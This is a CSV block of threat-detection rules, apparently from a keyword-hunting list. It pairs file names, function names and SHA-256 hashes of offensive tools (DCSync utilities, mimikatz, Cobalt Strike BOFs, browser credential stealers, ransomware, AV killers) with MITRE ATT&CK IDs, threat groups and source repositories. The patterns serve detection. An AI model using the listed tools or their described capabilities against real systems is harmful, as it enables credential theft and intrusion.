"*dcsync@protonmail.com*",".{0,1000}dcsync\@protonmail\.com.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","#email","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","40396"
"*dcsync_inject*",".{0,1000}dcsync_inject.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40397"
"*dcsyncattack(*",".{0,1000}dcsyncattack\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","40398"
"*dcsyncattack.py*",".{0,1000}dcsyncattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","40399"
"*dcsyncattack.py*",".{0,1000}dcsyncattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40400"
"*dcsyncclient.*",".{0,1000}dcsyncclient\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","40401"
"*dcsyncclient.py*",".{0,1000}dcsyncclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","40402"
"*dcsyncclient.py*",".{0,1000}dcsyncclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40403"
"*DCSyncer.exe*",".{0,1000}DCSyncer\.exe.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","40404"
"*DCSyncer-master.zip*",".{0,1000}DCSyncer\-master\.zip.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","40405"
"*DCSyncer-x64.exe*",".{0,1000}DCSyncer\-x64\.exe.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","40406"
"*dd04c6f2ba77715ff269edd6cc092599ddf0e8c5a9f6c47282e9b24d59ec7478*",".{0,1000}dd04c6f2ba77715ff269edd6cc092599ddf0e8c5a9f6c47282e9b24d59ec7478.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40410"
"*dd05c2d2a5d00de8f4ef3dd6d8e2304d2ecb3787e97edd0e38867d047b0936a0*",".{0,1000}dd05c2d2a5d00de8f4ef3dd6d8e2304d2ecb3787e97edd0e38867d047b0936a0.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","40411"
"*dd09d2d4ba9ffc6ddc939ede8a494a4aaadccdcfa441576499f1b85d8580f97e*",".{0,1000}dd09d2d4ba9ffc6ddc939ede8a494a4aaadccdcfa441576499f1b85d8580f97e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40412"
"*dd09fce7013555b0f00b3ec47a56274ff29dafd26922c60ef0a331b4d5d299f8*",".{0,1000}dd09fce7013555b0f00b3ec47a56274ff29dafd26922c60ef0a331b4d5d299f8.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","40413"
"*dd14d6cd273d756c527fc0fa4b55e5bc33518d51d713325846458df7894b0d24*",".{0,1000}dd14d6cd273d756c527fc0fa4b55e5bc33518d51d713325846458df7894b0d24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40415"
"*dd15d1c8a833d00505cfb93910c5af2d98e78809c4295fd39a8bd656230205e1*",".{0,1000}dd15d1c8a833d00505cfb93910c5af2d98e78809c4295fd39a8bd656230205e1.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","40416"
"*dd16f575d6e76269c85b00dae2602c43aba8c51dfd2106c744e1fdaa2067c81f*",".{0,1000}dd16f575d6e76269c85b00dae2602c43aba8c51dfd2106c744e1fdaa2067c81f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40417"
"*dd226a8ba33f50cd9ca4fedcec4df5c29e6b9841cb8cf2ab2d940bdef8a0a403*",".{0,1000}dd226a8ba33f50cd9ca4fedcec4df5c29e6b9841cb8cf2ab2d940bdef8a0a403.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40421"
"*dd307d39038a79e45a140d13c406c084fceb840317a7c53a5d929012fa409cf3*",".{0,1000}dd307d39038a79e45a140d13c406c084fceb840317a7c53a5d929012fa409cf3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40423"
"*dd35d7c7b99d5a0a182ff16546ebee8af08ee92510157d6f02355bae256d6191*",".{0,1000}dd35d7c7b99d5a0a182ff16546ebee8af08ee92510157d6f02355bae256d6191.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","#filehash","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","40424"
"*dd3cd4783ec400f215c4f72f797fe310be12453c20944feec054a449835feb36*",".{0,1000}dd3cd4783ec400f215c4f72f797fe310be12453c20944feec054a449835feb36.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","#filehash","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","40425"
"*dd3dc6677db3402e952a4e127c19ed19a0a95772e2353734af4a94f61a27f580*",".{0,1000}dd3dc6677db3402e952a4e127c19ed19a0a95772e2353734af4a94f61a27f580.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40426"
"*dd3f2e3349c378e1a415c4a6ad450cd3ae4ea29f3fe15d0a72bff64a44e1362a*",".{0,1000}dd3f2e3349c378e1a415c4a6ad450cd3ae4ea29f3fe15d0a72bff64a44e1362a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40428"
"*dd3f2e3349c378e1a415c4a6ad450cd3ae4ea29f3fe15d0a72bff64a44e1362a*",".{0,1000}dd3f2e3349c378e1a415c4a6ad450cd3ae4ea29f3fe15d0a72bff64a44e1362a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40429"
"*dd4543fa5f777ca9ad6ab6bf3d53cc8f186113da38d81159c776b1476eecb5e8*",".{0,1000}dd4543fa5f777ca9ad6ab6bf3d53cc8f186113da38d81159c776b1476eecb5e8.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","40431"
"*dd4f3e4b946d9f070137a899653083858ae7a973d0c3c5c2dde1c39e6d44e116*",".{0,1000}dd4f3e4b946d9f070137a899653083858ae7a973d0c3c5c2dde1c39e6d44e116.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40433"
"*DD5BAEEE88AA8F4EF1A0421214C5D42F28786C84C8A4C3C3C3C8897F553D9347*",".{0,1000}DD5BAEEE88AA8F4EF1A0421214C5D42F28786C84C8A4C3C3C3C8897F553D9347.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40437"
"*dd5cbddadb4446fe8e9558788ea449ac7f497973cf83ef9d8acc3803cfae956b*",".{0,1000}dd5cbddadb4446fe8e9558788ea449ac7f497973cf83ef9d8acc3803cfae956b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40438"
"*dd6a39d94965fa111cdf668b932ada92a4da94aaf90a4d3d2bd13f6232372b77*",".{0,1000}dd6a39d94965fa111cdf668b932ada92a4da94aaf90a4d3d2bd13f6232372b77.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40440"
"*dd6c8226641df9aa2a08e5e11949430e94773d763734ec3516a7976ad8d10f1a*",".{0,1000}dd6c8226641df9aa2a08e5e11949430e94773d763734ec3516a7976ad8d10f1a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40441"
"*dd6e426856acc656cadd4587fa002d4fe50f3370915932256887fa3d9d016687*",".{0,1000}dd6e426856acc656cadd4587fa002d4fe50f3370915932256887fa3d9d016687.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","40442"
